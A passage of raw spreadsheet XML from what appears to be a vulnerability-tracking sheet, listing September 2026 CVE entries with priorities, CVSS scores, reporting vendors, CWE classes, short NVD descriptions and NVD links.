t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t></is></c></row><row r="293"><c r="A293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C293" s="5" t="inlineStr"><is><t>CVE-2026-86722</t></is></c><c r="D293" s="5" t="n"><v>8.6</v></c><c r="E293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F293" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G293" s="5" t="inlineStr" /><c r="H293" s="5" t="n"><v>0.003</v></c><c r="I293" s="5" t="inlineStr" /><c r="J293" s="5" t="inlineStr" /><c r="K293" s="5" t="inlineStr" /><c r="L293" s="5" t="inlineStr" /><c r="M293" s="5" t="inlineStr" /><c r="N293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P293" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q293" s="5" t="inlineStr" /><c r="R293" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S293" s="5" t="inlineStr"><is><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is></c><c r="T293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t></is></c></row><row r="294"><c r="A294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C294" s="5" t="inlineStr"><is><t>CVE-2026-58113</t></is></c><c r="D294" s="5" t="n"><v>8.5</v></c><c r="E294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F294" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G294" s="5" t="inlineStr" /><c r="H294" s="5" t="n"><v>0.002</v></c><c r="I294" s="5" t="inlineStr" /><c r="J294" s="5" t="inlineStr" /><c r="K294" s="5" t="inlineStr" /><c r="L294" s="5" t="inlineStr" /><c r="M294" s="5" t="inlineStr" /><c r="N294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q294" s="5" t="inlineStr" /><c r="R294" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S294" s="5" t="inlineStr"><is><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is></c><c r="T294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t></is></c></row><row r="295"><c r="A295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C295" s="5" t="inlineStr"><is><t>CVE-2026-67378</t></is></c><c r="D295" s="5" t="n"><v>8.5</v></c><c r="E295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G295" s="5" t="inlineStr" /><c r="H295" s="5" t="n"><v>0.005</v></c><c r="I295" s="5" t="inlineStr" /><c r="J295" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K295" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L295" s="5" t="inlineStr" /><c r="M295" s="5" t="inlineStr" /><c r="N295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P295" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q295" s="5" t="inlineStr" /><c r="R295" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S295" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t></is></c></row><row r="296"><c r="A296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C296" s="5" t="inlineStr"><is><t>CVE-2026-67379</t></is></c><c r="D296" s="5" t="n"><v>8.5</v></c><c r="E296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F296" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G296" s="5" t="inlineStr" /><c r="H296" s="5" t="n"><v>0.006</v></c><c r="I296" s="5" t="inlineStr" /><c r="J296" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K296" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L296" s="5" t="inlineStr" /><c r="M296" s="5" t="inlineStr" /><c r="N296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P296" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q296" s="5" t="inlineStr" /><c r="R296" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S296" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t></is></c></row><row r="297"><c r="A297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C297" s="5" t="inlineStr"><is><t>CVE-2026-67636</t></is></c><c r="D297" s="5" t="n"><v>8.5</v></c><c r="E297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G297" s="5" t="inlineStr" /><c r="H297" s="5" t="n"><v>0.005</v></c><c r="I297" s="5" t="inlineStr" /><c r="J297" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K297" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L297" s="5" t="inlineStr" /><c r="M297" s="5" t="inlineStr" /><c r="N297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P297" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q297" s="5" t="inlineStr" /><c r="R297" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S297" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t></is></c></row><row r="298"><c r="A298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C298" s="5" t="inlineStr"><is><t>CVE-2026-74860</t></is></c><c r="D298" s="5" t="n"><v>8.5</v></c><c r="E298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F298" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G298" s="5" t="inlineStr" /><c r="H298" s="5" t="n"><v>0.004</v></c><c r="I298" s="5" t="inlineStr" /><c r="J298" s="5" t="inlineStr" /><c r="K298" s="5" t="inlineStr" /><c r="L298" s="5" t="inlineStr" /><c r="M298" s="5" t="inlineStr" /><c r="N298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q298" s="5" t="inlineStr" /><c r="R298" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S298" s="5" t="inlineStr"><is><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is></c><c r="T298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t></is></c></row><row r="299"><c r="A299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C299" s="5" t="inlineStr"><is><t>CVE-2026-75993</t></is></c><c r="D299" s="5" t="n"><v>8.5</v></c><c r="E299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F299" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G299" s="5" t="inlineStr" /><c r="H299" s="5" t="n"><v>0.004</v></c><c r="I299" s="5" t="inlineStr" /><c r="J299" s="5" t="inlineStr" /><c r="K299" s="5" t="inlineStr" /><c r="L299" s="5" t="inlineStr" /><c r="M299" s="5" t="inlineStr" /><c r="N299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P299" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q299" s="5" t="inlineStr" /><c r="R299" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S299" s="5" t="inlineStr"><is><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is></c><c r="T299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t></is></c></row><row r="300"><c r="A300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C300" s="5" t="inlineStr"><is><t>CVE-2026-76958</t></is></c><c r="D300" s="5" t="n"><v>8.5</v></c><c r="E300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F300" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G300" s="5" t="inlineStr" /><c r="H300" s="5" t="n"><v>0.002</v></c><c r="I300" s="5" t="inlineStr" /><c r="J300" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K300" s="5" t="inlineStr" /><c r="L300" s="5" t="inlineStr" /><c r="M300" s="5" t="inlineStr" /><c r="N300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q300" s="5" t="inlineStr" /><c r="R300" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S300" s="5" t="inlineStr"><is><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is></c><c r="T300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t></is></c></row><row r="301"><c r="A301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C301" s="5" t="inlineStr"><is><t>CVE-2026-85384</t></is></c><c r="D301" s="5" t="n"><v>8.5</v></c><c r="E301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F301" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G301" s="5" t="inlineStr" /><c r="H301" s="5" t="n"><v>0.002</v></c><c r="I301" s="5" t="inlineStr" /><c r="J301" s="5" t="inlineStr" /><c r="K301" s="5" t="inlineStr" /><c r="L301" s="5" t="inlineStr" /><c r="M301" s="5" t="inlineStr" /><c r="N301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P301" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q301" s="5" t="inlineStr" /><c r="R301" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S301" s="5" t="inlineStr"><is><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is></c><c r="T301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t></is></c></row><row r="302"><c r="A302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C302" s="5" t="inlineStr"><is><t>CVE-2026-69479</t></is></c><c r="D302" s="5" t="n"><v>8.4</v></c><c r="E302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G302" s="5" t="inlineStr" /><c r="H302" s="5" t="n"><v>0.003</v></c><c r="I302" s="5" t="inlineStr" /><c r="J302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K30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2" s="5" t="inlineStr" /><c r="M302" s="5" t="inlineStr" /><c r="N302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P302" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q302" s="5" t="inlineStr" /><c r="R302" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S302" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t></is></c></row><row r="303"><c r="A303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C303" s="5" t="inlineStr"><is><t>CVE-2026-69638</t></is></c><c r="D303" s="5" t="n"><v>8.4</v></c><c r="E303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G303" s="5" t="inlineStr" /><c r="H303" s="5" t="n"><v>0.003</v></c><c r="I303" s="5" t="inlineStr" /><c r="J303" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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3" s="5" t="inlineStr" /><c r="M303" s="5" t="inlineStr" /><c r="N303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P303" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q303" s="5" t="inlineStr" /><c r="R303" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S303" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t></is></c></row><row r="304"><c r="A304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C304" s="5" t="inlineStr"><is><t>CVE-2026-75999</t></is></c><c r="D304" s="5" t="n"><v>8.4</v></c><c r="E304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G304" s="5" t="inlineStr" /><c r="H304" s="5" t="n"><v>0.004</v></c><c r="I304" s="5" t="inlineStr" /><c r="J304" s="5" t="inlineStr" /><c r="K304" s="5" t="inlineStr" /><c r="L304" s="5" t="inlineStr" /><c r="M304" s="5" t="inlineStr" /><c r="N304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P304" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q304" s="5" t="inlineStr" /><c r="R304" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S304" s="5" t="inlineStr"><is><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is></c><c r="T304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t></is></c></row><row r="305"><c r="A305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C305" s="5" t="inlineStr"><is><t>CVE-2026-77827</t></is></c><c r="D305" s="5" t="n"><v>8.4</v></c><c r="E305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F305" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G305" s="5" t="inlineStr" /><c r="H305" s="5" t="n"><v>0.002</v></c><c r="I305" s="5" t="inlineStr" /><c r="J305" s="5" t="inlineStr" /><c r="K305" s="5" t="inlineStr" /><c r="L305" s="5" t="inlineStr" /><c r="M305" s="5" t="inlineStr" /><c r="N305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P305" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q305" s="5" t="inlineStr" /><c r="R305" s="5" t="inlineStr"><is><t>CWE-428</t></is></c><c r="S305" s="5" t="inlineStr"><is><t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t></is></c><c r="T305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t></is></c></row><row r="306"><c r="A306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C306" s="5" t="inlineStr"><is><t>CVE-2026-86819</t></is></c><c r="D306" s="5" t="n"><v>8.4</v></c><c r="E306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F306" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G306" s="5" t="inlineStr" /><c r="H306" s="5" t="n"><v>0.001</v></c><c r="I306" s="5" t="inlineStr" /><c r="J306" s="5" t="inlineStr" /><c r="K306" s="5" t="inlineStr" /><c r="L306" s="5" t="inlineStr" /><c r="M306" s="5" t="inlineStr" /><c r="N306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P306" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q306" s="5" t="inlineStr" /><c r="R306" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S306" s="5" t="inlineStr"><is><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is></c><c r="T306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t></is></c></row><row r="307"><c r="A307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C307" s="5" t="inlineStr"><is><t>CVE-2026-19203</t></is></c><c r="D307" s="5" t="n"><v>8.300000000000001</v></c><c r="E307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F307" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G307" s="5" t="inlineStr" /><c r="H307" s="5" t="n"><v>0.003</v></c><c r="I307" s="5" t="inlineStr" /><c r="J307" s="5" t="inlineStr" /><c r="K307" s="5" t="inlineStr" /><c r="L307" s="5" t="inlineStr" /><c r="M307" s="5" t="inlineStr" /><c r="N307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q307" s="5" t="inlineStr" /><c r="R307" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S307" s="5" t="inlineStr"><is><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is></c><c r="T307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t></is></c></row><row r="308"><c r="A308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C308" s="5" t="inlineStr"><is><t>CVE-2026-69646</t></is></c><c r="D308" s="5" t="n"><v>8.300000000000001</v></c><c r="E308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G308" s="5" t="inlineStr" /><c r="H308" s="5" t="n"><v>0.002</v></c><c r="I308" s="5" t="inlineStr" /><c r="J308" s="5" t="inlineStr" /><c r="K308" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L308" s="5" t="inlineStr" /><c r="M308" s="5" t="inlineStr" /><c r="N308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P308" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q308" s="5" t="inlineStr" /><c r="R308" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S308" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t></is></c></row><row r="309"><c r="A309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C309" s="5" t="inlineStr"><is><t>CVE-2026-81821</t></is></c><c r="D309" s="5" t="n"><v>8.300000000000001</v></c><c r="E309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F309" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G309" s="5" t="inlineStr" /><c r="H309" s="5" t="n"><v>0.001</v></c><c r="I309" s="5" t="inlineStr" /><c r="J309" s="5" t="inlineStr" /><c r="K309" s="5" t="inlineStr" /><c r="L309" s="5" t="inlineStr" /><c r="M309" s="5" t="inlineStr" /><c r="N309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P309" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q309" s="5" t="inlineStr" /><c r="R309" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="S309" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t></is></c><c r="T309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t></is></c></row><row r="310"><c r="A310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C310" s="5" t="inlineStr"><is><t>CVE-2026-81822</t></is></c><c r="D310" s="5" t="n"><v>8.300000000000001</v></c><c r="E310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F310" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G310" s="5" t="inlineStr" /><c r="H310" s="5" t="n"><v>0.001</v></c><c r="I310" s="5" t="inlineStr" /><c r="J310" s="5" t="inlineStr" /><c r="K310" s="5" t="inlineStr" /><c r="L310" s="5" t="inlineStr" /><c r="M310" s="5" t="inlineStr" /><c r="N310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P310" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q310" s="5" t="inlineStr" /><c r="R310" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S310" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t></is></c><c r="T310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t></is></c></row><row r="311"><c r="A311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C311" s="5" t="inlineStr"><is><t>CVE-2026-69846</t></is></c><c r="D311" s="5" t="n"><v>8.199999999999999</v></c><c r="E311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G311" s="5" t="inlineStr" /><c r="H311" s="5" t="n"><v>0.003</v></c><c r="I311" s="5" t="inlineStr" /><c r="J311" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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11" s="5" t="inlineStr" /><c r="M311" s="5" t="inlineStr" /><c r="N311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P311" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q311" s="5" t="inlineStr" /><c r="R311" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S311" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t></is></c></row><row r="312"><c r="A312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C312" s="5" t="inlineStr"><is><t>CVE-2026-69906</t></is></c><c r="D312" s="5" t="n"><v>8.199999999999999</v></c><c r="E312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G312" s="5" t="inlineStr" /><c r="H312" s="5" t="n"><v>0.003</v></c><c r="I312" s="5" t="inlineStr" /><c r="J312" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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12" s="5" t="inlineStr" /><c r="M312" s="5" t="inlineStr" /><c r="N312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P312" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q312" s="5" t="inlineStr" /><c r="R312" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S312" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t></is></c></row><row r="313"><c r="A313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C313" s="5" t="inlineStr"><is><t>CVE-2026-72958</t></is></c><c r="D313" s="5" t="n"><v>8.199999999999999</v></c><c r="E313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G313" s="5" t="inlineStr" /><c r="H313" s="5" t="n"><v>0.003</v></c><c r="I313" s="5" t="inlineStr" /><c r="J313" s="5" t="inlineStr" /><c r="K313" s="5" t="inlineStr" /><c r="L313" s="5" t="inlineStr" /><c r="M313" s="5" t="inlineStr" /><c r="N313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q313" s="5" t="inlineStr" /><c r="R313" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S313" s="5" t="inlineStr"><is><t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t></is></c></row><row r="314"><c r="A314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C314" s="5" t="inlineStr"><is><t>CVE-2026-72961</t></is></c><c r="D314" s="5" t="n"><v>8.199999999999999</v></c><c r="E314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G314" s="5" t="inlineStr" /><c r="H314" s="5" t="n"><v>0.003</v></c><c r="I314" s="5" t="inlineStr" /><c r="J314" s="5" t="inlineStr" /><c r="K314" s="5" t="inlineStr" /><c r="L314" s="5" t="inlineStr" /><c r="M314" s="5" t="inlineStr" /><c r="N314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q314" s="5" t="inlineStr" /><c r="R314" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t></is></c></row><row r="315"><c r="A315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C315" s="5" t="inlineStr"><is><t>CVE-2026-72962</t></is></c><c r="D315" s="5" t="n"><v>8.199999999999999</v></c><c r="E315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G315" s="5" t="inlineStr" /><c r="H315" s="5" t="n"><v>0.003</v></c><c r="I315" s="5" t="inlineStr" /><c r="J315" s="5" t="inlineStr" /><c r="K315" s="5" t="inlineStr" /><c r="L315" s="5" t="inlineStr" /><c r="M315" s="5" t="inlineStr" /><c r="N315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q315" s="5" t="inlineStr" /><c r="R315" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S315" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t></is></c></row><row r="316"><c r="A316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C316" s="5" 